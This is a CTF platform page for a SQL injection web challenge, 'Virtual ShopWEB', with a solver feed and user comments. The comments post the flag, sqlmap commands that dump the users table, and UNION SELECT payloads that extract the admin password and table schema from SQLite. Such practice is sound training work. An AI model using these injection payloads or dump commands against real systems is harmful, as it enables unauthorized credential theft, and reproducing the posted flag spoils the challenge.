Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
228
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
tmwxtavpoh 攻破了该题 13小时前
xxxxhunter 攻破了该题 21小时前
nihaolmb 攻破了该题 14天前
Chls123 攻破了该题 16天前
18144280602 攻破了该题 22天前
MonkeZ 攻破了该题 23天前
vincentshine 攻破了该题 25天前
fogoo 攻破了该题 26天前
littlebear4 攻破了该题 26天前
wcsndm 攻破了该题 29天前
2MASS 攻破了该题 1月前
Timeo 攻破了该题 1月前
8008120286 攻破了该题 1月前
maomaoht 攻破了该题 1月前
admin9101 攻破了该题 1月前
Zacks 攻破了该题 1月前
adminasdfg 攻破了该题 1月前
15954133759 攻破了该题 1月前
xianbangz 攻破了该题 1月前
评论
欧尼酱001 1月前
举报
1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}
WCRH 1月前
举报
这又不是post请求,你还保存上txt了
15614005380 9月前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 10月前
举报
union查询
xiaobai568 11月前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 11月前
举报
sqlmap即可
chaoge 1年前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 1年前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 1年前
举报
sqlmap一下子就出来了
hopeinhand 1年前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了